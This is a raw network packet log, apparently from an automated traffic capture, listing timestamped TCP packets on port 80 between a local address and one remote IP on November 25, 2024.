                                                                                                                              Nov 25, 2024 07:08:42.598864079 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.598884106 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.598901987 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.598913908 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.598927021 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.599013090 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.599153042 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.599208117 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.599217892 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.599289894 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.599359989 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.599371910 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.599431038 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.718547106 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.718559980 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.718651056 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.728070974 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.728158951 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.728193998 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.728271008 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.730550051 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.730576038 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.730622053 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.809710979 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.809844017 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.810019970 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.813602924 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.813654900 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.813762903 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.821976900 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.822093010 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.822153091 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.822232962 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.830359936 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.830468893 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.830518961 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.830609083 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.838726044 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.838789940 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.838825941 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.838881016 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.847086906 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.847196102 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.847204924 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.847284079 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.855458021 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.855532885 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.855566978 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.855679035 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.863096952 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.863166094 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.863193035 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.863249063 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.870773077 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.870835066 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.870846987 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.871037960 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.878473043 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.878567934 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.938560963 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.938646078 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.938697100 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.938755989 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.942394018 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.942457914 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.942497015 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.942573071 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:42.950011015 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.950078964 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.019999027 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.020138025 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.020148039 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.020279884 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.022531033 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.022639990 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.022707939 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.027667046 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.027755022 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.027803898 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.027863979 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.032696009 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.032769918 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.032769918 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.032825947 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.037673950 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.037875891 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.037961960 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.042790890 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.042951107 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.043044090 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.047836065 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.047933102 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.048027992 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.052881956 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.052998066 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.053105116 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.058166027 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.058363914 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.058439970 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.062962055 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.063250065 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.063345909 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.068084002 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.068173885 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.068258047 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.073156118 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.073282003 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.073286057 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.073349953 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.077855110 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.077991962 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.078077078 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.082595110 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.082616091 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.082722902 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.087443113 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.087615013 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.087707043 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.092152119 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.092237949 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.092331886 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.096875906 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.096905947 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.097002029 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.101512909 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.104796886 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.149189949 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.149327993 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.149405956 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.151576042 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.151640892 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.151707888 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.151812077 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.156364918 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.156476021 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.156548023 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.161026955 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.161092997 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.161158085 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.165811062 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.165908098 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.165966988 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.170516968 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.172771931 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.230423927 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.230520964 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.230550051 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.230628014 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.231918097 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.231985092 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.231992006 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.232053995 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.235162020 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.235229969 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.235279083 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.235363007 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.237958908 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.238038063 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.238081932 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.238136053 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.241003036 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.241070032 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.241209984 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.241257906 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.244062901 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.244147062 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.244174957 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.244252920 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.247061968 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.247119904 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.247165918 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.247211933 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.250088930 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.250145912 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.250189066 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.250230074 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.253134012 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.253196955 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.253252029 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.253315926 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.256169081 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.256190062 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.256217957 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.256243944 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.259144068 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.259308100 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.259337902 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.259368896 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.262207985 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.262258053 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.262309074 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.262482882 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.265189886 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.265244007 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.265326977 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.265383959 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.268256903 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.268309116 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.268733978 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.268788099 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.271230936 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.271281958 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.271358013 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.271405935 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.274446011 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.274502993 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.274594069 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.274652958 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.277288914 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.277353048 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.277400017 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.277446032 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.280066967 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.280117989 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.280163050 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.280214071 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.282669067 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.282723904 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.282839060 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.282892942 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.285259962 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.285280943 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.285336018 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.285336971 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.288424969 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.288481951 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.288566113 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.288626909 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.290369034 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.290424109 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.290503025 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.290549994 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.292871952 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.292932987 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.292942047 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.292989016 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.295357943 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.295417070 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.295454979 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.295504093 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.297882080 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.297935009 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.360733032 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.360796928 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.360908031 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.361984968 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.362085104 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.362405062 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.362483025 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.362531900 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.362597942 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.364943027 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.365039110 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.365066051 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.365117073 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.367472887 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.367542028 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.367578983 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.367645979 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.369988918 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.370069981 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.370111942 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.370182037 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.372560978 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.372608900 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.372636080 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.372668028 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.375060081 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.375135899 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.375174046 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.375232935 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.377551079 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.377619982 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.377662897 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.377741098 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.380080938 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.380161047 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.380162001 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.380214930 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.382599115 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.382679939 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.399923086 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.400022984 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.400070906 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.400132895 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.441131115 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.441204071 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.441245079 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.441287041 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.441859961 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.441931963 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.441971064 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.442034960 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.443670034 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.443734884 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.443790913 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.443845987 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.445493937 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.445563078 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.445600033 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.445657015 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.447335958 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.447403908 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.447441101 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.447505951 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.449142933 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.449202061 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.449269056 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.449326038 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.450963020 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.451020002 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.451097965 CET8049751185.244.144.68192.168.2.5
